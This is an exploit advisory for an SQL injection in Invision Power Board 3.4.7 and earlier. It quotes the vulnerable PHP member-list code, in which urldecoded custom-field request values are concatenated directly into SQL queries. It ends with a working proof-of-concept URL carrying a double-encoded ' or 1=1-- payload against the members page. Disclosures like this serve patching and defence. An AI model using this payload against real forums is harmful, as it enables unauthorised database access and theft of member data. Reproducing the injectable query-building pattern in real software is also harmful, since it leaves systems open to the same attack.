# Exploit Title: Invision Power Board <= 3.4.7 SQL Injection
# Date: 29.05.2015
# Exploit Author: ZeroDay
# Software Link: http://www.invisionpower.com/
# Version: <= 3.4.7
# Tested on: 3.4.7
# About: For the G-Owl with Love
vuln code
admin/applications/members/modules_public/list/view.php
//-----------------------------------------
// Custom fields?
//-----------------------------------------
if ( count( $this->custom_fields->out_fields ) )
{
foreach( $this->custom_fields->out_fields as $id => $data )
{
if ( !empty($this->request[ 'field_' . $id ]) )
{
$_queryPP = true;

if( is_array($this->request[ 'field_' . $id ]) )
{
foreach( $this->request[ 'field_' . $id ] as $k => $v )
{
$this->request[ 'field_' . $id ][ $k ] = urldecode($v);
$url['field_' . $id] = "field_{$id}[{$k}]=" . $v;
}
}
else
{
$url['field_' . $id] = "field_{$id}=" . $this->request[ 'field_' . $id ];
$this->request[ 'field_' . $id ] = urldecode($this->request[ 'field_' . $id ]);
}

if( $this->custom_fields->cache_data[ $id ]['pf_type'] == 'drop' )
{
$query[] = "p.field_{$id}='" . $this->request[ 'field_' . $id ] . "'";
}
else if( $this->custom_fields->cache_data[ $id ]['pf_type'] == 'cbox' )
{
if ( count( $this->request[ 'field_' . $id ] ) )
{
if ( $this->custom_fields->cache_data[ $id ]['pf_search_type'] == 'loose' )
{
$cboxFields = array();
foreach ( $this->request[ 'field_' . $id ] as $k => $v )
{
$cboxFields[] = "p.field_{$id} LIKE '%|{$k}|%'";
}

$query[] = "( " . implode( ' OR ', $cboxFields ) . " )";
}
else
{
foreach ( $this->request[ 'field_' . $id ] as $k => $v )
{
$query[] = "p.field_{$id} LIKE '%|{$k}|%'";
}
}
}
}
else
{
$query[] = $this->custom_fields->cache_data[ $id ]['pf_search_type'] == 'loose' ? "p.field_{$id} LIKE '%" . $this->request[ 'field_' . $id ] . "%'" : "p.field_{$id} = '" . $this->request[ 'field_' . $id ] . "'";
}
}
}
}
......
POC
index.php?/members/?field_1=admin%2525%2527%2Bor%2B1%253D1--%2B1